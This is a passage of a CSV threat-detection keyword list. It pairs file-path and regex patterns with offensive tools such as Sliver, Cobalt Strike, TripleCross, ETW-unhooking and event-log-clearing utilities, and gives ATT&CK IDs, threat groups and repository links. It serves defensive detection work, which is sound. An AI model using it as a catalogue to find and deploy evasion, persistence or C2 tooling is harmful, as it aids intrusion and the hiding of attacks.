Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7005" "*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7006" "*/etc/init.d/tor2web*",".{0,1000}\/etc\/init\.d\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","7007" "*/etc/kidlogger*",".{0,1000}\/etc\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7008" "*/etc/ld.so.preload && rm* process successfully hidden*",".{0,1000}\/etc\/ld\.so\.preload\s\&\&\srm.{0,1000}\sprocess\ssuccessfully\shidden.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7009"
"*/etc/nps/conf/*",".{0,1000}\/etc\/nps\/conf\/.{0,1000}","offensive_tool_keyword","nps","Chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","7013" "*/etc/passwd*/.sudo_as_admin_successful*",".{0,1000}\/etc\/passwd.{0,1000}\/\.sudo_as_admin_successful.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","7015" "*/etc/proxychains.conf*",".{0,1000}\/etc\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","7016" "*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","7019" "*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 -
TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","7020" "*/etc/sudoers.d/ebpfbackdoor*",".{0,1000}\/etc\/sudoers\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","7023" "*/etc/sv/tor/log*",".{0,1000}\/etc\/sv\/tor\/log.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7024" "*/etc/systemd/gsc*",".{0,1000}\/etc\/systemd\/gsc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other.
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7025" "*/etc/systemd/system/IMDS.service*",".{0,1000}\/etc\/systemd\/system\/IMDS\.service.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","#linux","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","7027" "*/etc/systemd/system/sliver.service*",".{0,1000}\/etc\/systemd\/system\/sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7029" "*/etc/tor/*.conf*",".{0,1000}\/etc\/tor\/.{0,1000}\.conf.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attackers for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","7030" "*/etc/xdg/autostart/evilxdg.desktop*",".{0,1000}\/etc\/xdg\/autostart\/evilxdg\.desktop.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","7034" "*/eternal_checker.py*",".{0,1000}\/eternal_checker\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","7037" "*/EternalHushCore.dll*",".{0,1000}\/EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","7038" "*/EternalHushFramework.git*",".{0,1000}\/EternalHushFramework\.git.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework.
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","7039" "*/etumbot.profile*",".{0,1000}\/etumbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 
BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7040" "*/etw.cna",".{0,1000}\/etw\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7041" "*/etw.x64.*",".{0,1000}\/etw\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7042" "*/etw.x86.*",".{0,1000}\/etw\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","7043" "*/etw-fuck.cpp*",".{0,1000}\/etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7044" "*/etw-fuck.exe*",".{0,1000}\/etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7045" "*/ETWHash/*",".{0,1000}\/ETWHash\/.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 
","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","7046" "*/etwunhook.cpp*",".{0,1000}\/etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7047" "*/etwunhook.exe*",".{0,1000}\/etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7048" "*/etwunhook.git*",".{0,1000}\/etwunhook\.git.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. 
Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","7049" "*/evasion/evasion.go",".{0,1000}\/evasion\/evasion\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7050" "*/evasion/windows/*",".{0,1000}\/evasion\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used, open-source framework designed for penetration testing, vulnerability assessment, and exploit development. It provides security professionals and researchers with a comprehensive platform to discover, exploit, and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits, payloads, and auxiliary modules that can be used to test various attack vectors, identify security weaknesses, and simulate real-world cyberattacks. By utilizing Metasploit,
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7051" "*/evasion_linux.go*",".{0,1000}\/evasion_linux\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7052" "*/evasion_windows.go*",".{0,1000}\/evasion_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7053"
"*/EventCleaner.cpp*",".{0,1000}\/EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7054" "*/EventCleaner.exe*",".{0,1000}\/EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7055" "*/EventCleaner.git*",".{0,1000}\/EventCleaner\.git.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7056" "*/EventLogCrasher.git*",".{0,1000}\/EventLogCrasher\.git.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","7057" "*/EventLogCredentials.ps1*",".{0,1000}\/EventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","7058" 
"*/Eventlogedit-evt--General.git*",".{0,1000}\/Eventlogedit\-evt\-\-General\.git.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","7059" "*/Eventlogedit-evtx--Evolution.git*",".{0,1000}\/Eventlogedit\-evtx\-\-Evolution\.git.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","7060" "*/EventLogMaster.git*",".{0,1000}\/EventLogMaster\.git.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","7061" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","7062" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
